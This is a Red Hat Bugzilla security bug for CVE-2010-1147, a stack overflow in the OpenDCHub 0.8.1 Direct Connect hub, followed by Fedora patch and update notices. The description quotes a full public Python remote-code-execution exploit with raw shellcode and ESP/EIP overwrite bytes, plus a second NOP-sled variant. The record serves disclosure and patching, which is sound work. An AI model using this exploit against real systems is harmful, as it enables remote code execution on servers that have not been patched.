Bug 579206 (CVE-2010-1147)
Summary: | CVE-2010-1147 OpenDCHub v0.8.1: Stack overflow by handling a specially-crafted MyINFO message | ||
---|---|---|---|
Product: | [Other] Security Response | Reporter: | Jan Lieskovsky <jlieskov> |
Component: | vulnerability | Assignee: | Red Hat Product Security <security-response-team> |
Status: | CLOSED ERRATA | QA Contact: | |
Severity: | medium | Docs Contact: | |
Priority: | medium | ||
Version: | unspecified | CC: | singh.roshan08 |
Target Milestone: | --- | Keywords: | Security |
Target Release: | --- | ||
Hardware: | All | ||
OS: | Linux | ||
URL: | http://www.indahax.com/exploits/opendchub-0-8-1-remote-code-execution-exploit#more-600 | ||
Whiteboard: | |||
Fixed In Version: | Doc Type: | Bug Fix | |
Doc Text: | Story Points: | --- | |
Clone Of: | Environment: | ||
Last Closed: | 2021-10-19 09:11:23 UTC | Type: | --- |
Regression: | --- | Mount Type: | --- |
Documentation: | --- | CRM: | |
Verified Versions: | Category: | --- | |
oVirt Team: | --- | RHEL 7.3 requirements from Atomic Host: | |
Cloudforms Team: | --- | Target Upstream Version: | |
Embargoed: | |||
Bug Depends On: | 579207 | ||
Bug Blocks: |
Description
Jan Lieskovsky
2010-04-03 09:11:37 UTC
Public PoCs by Pierre posted in [1]: #!/usr/bin/python # # OpenDcHub 0.8.1 Remote Code Execution Exploit # Pierre Nogues - http://www.indahax.com # # Description: # OpenDcHub is a direct connect hub for Linux # # OpenDcHub doesn't handle specially crafted MyINFO message which lead to a stack overflow. # # Affected versions : # OpenDcHub 0.8.1 # # Plateforms : # Unix # # Usage : # ./exploit.py import socket host = '192.168.1.9' port = 5000 # must not contain \x36 \x53 \x00 bytes # max shellcode size = 103 bytes use exploit v2 otherwise shellcode="\x33\xc9\xb1\x13\xba\xf6\x1d\xe7\xfa\xdb\xde\xd9\x74\x24" shellcode+="\xf4\x5e\x83\xc6\x04\x31\x56\x0a\x03\xa0\x17\x05\x0f\x7d" shellcode+="\xf3\x3e\x13\x2e\x40\x92\xbe\xd2\xcf\xf5\x8f\xb4\x02\x75" shellcode+="\xb4\x66\xf5\xb6\xe3\x97\x37\x51\x9c\x86\x6b\xfb\x0f\xc2" shellcode+="\x83\x52\xe0\x9b\x45\x17\x6a\xfd\xdd\x55\xea\x58\x59\xbc" shellcode+="\x5b\x65\xa8\xbf\xd5\xe0\xcb\x90\x8d\x3d\x03\x62\x26\x29" shellcode+="\x74\xe6\xdf\xc7\x03\x05\x4f\x44\x9d\x2b\xc0\x61\x50\x2b" shellcode+="\x2b" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s.send("$ValidateNick joseph|") hax="$MyINFO $ALL joseph " hax+=shellcode for i in range(103 - len(shellcode)): hax+="A" hax+="$" hax+="\x20\x81\x81\x80" # esp hax+="\xed\xf6\xfe\xbf" # eip hax+="S:-1|" s.send(hax) s.close() """ # V2 # more complex version working too, it have more space for the shellcode hax="$MyINFO $ALL joseph AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" hax+="\xFF\xFF\xFF\xFE" # local var int len of commands.c:my_info() must be a negative value hax+="TTTTUUUUVVVVWWWWXXXXYYYYZZZZBBBBCCCCEEEEEEE$" hax+="\x20\x81\x81\x80" # esp hax+="\x80\xf7\xfe\xbf" # eip hax+="\xCC\xCC\xCC\xCC" # useless var hax+="\x10\xf0\xfe\xbf" # this address + x20 will be overwritten by 4 bytes # shellcode time hax+="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" hax+="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" hax+=shellcode hax+="|" """ This issue affects the versions of the opendchub package, as shipped with Fedora releases of 11 and 12. Please fix. This is CVE-2010-1147. I have fixed the bug, and created the RPM, but I forgot to put the CVE ids in the RPM changelog. Do I need to recreate the RPM ? Hi Roshan, I can see "- New release with fix for buffer overflow" in the Changelog, which should be sufficient. (some further guide information is available also here: [1] https://bugzilla.redhat.com/show_bug.cgi?id=579207#c0) But please, by submitting request to Bodhi, be sure to mention the "CVE-2010-1147" identifier in the "Update Information" field, together with #579206 (this bug) within the "Bugs Fixed" field. Thanks && Regards, Jan. -- Jan iankko Lieskovsky / Red Hat Security Response Team opendchub-0.8.2-1.fc11 has been submitted as an update for Fedora 11. http://admin.fedoraproject.org/updates/opendchub-0.8.2-1.fc11 opendchub-0.8.2-1.fc12 has been submitted as an update for Fedora 12. http://admin.fedoraproject.org/updates/opendchub-0.8.2-1.fc12 opendchub-0.8.2-1.fc13 has been submitted as an update for Fedora 13. http://admin.fedoraproject.org/updates/opendchub-0.8.2-1.fc13 I have deleted these updates, I had uploaded the wrong tar ball to sourceforge, luckily nobody had downloaded it till then, I will update the RPM by today. I am sorry for the inconvenience. opendchub-0.8.2-2.fc12 has been submitted as an update for Fedora 12. http://admin.fedoraproject.org/updates/opendchub-0.8.2-2.fc12 opendchub-0.8.2-2.fc11 has been submitted as an update for Fedora 11. http://admin.fedoraproject.org/updates/opendchub-0.8.2-2.fc11 opendchub-0.8.2-2.fc13 has been submitted as an update for Fedora 13. http://admin.fedoraproject.org/updates/opendchub-0.8.2-2.fc13 opendchub-0.8.2-2.fc12 has been pushed to the Fedora 12 stable repository. If problems still persist, please make note of it in this bug report. opendchub-0.8.2-2.fc11 has been pushed to the Fedora 11 stable repository. If problems still persist, please make note of it in this bug report. |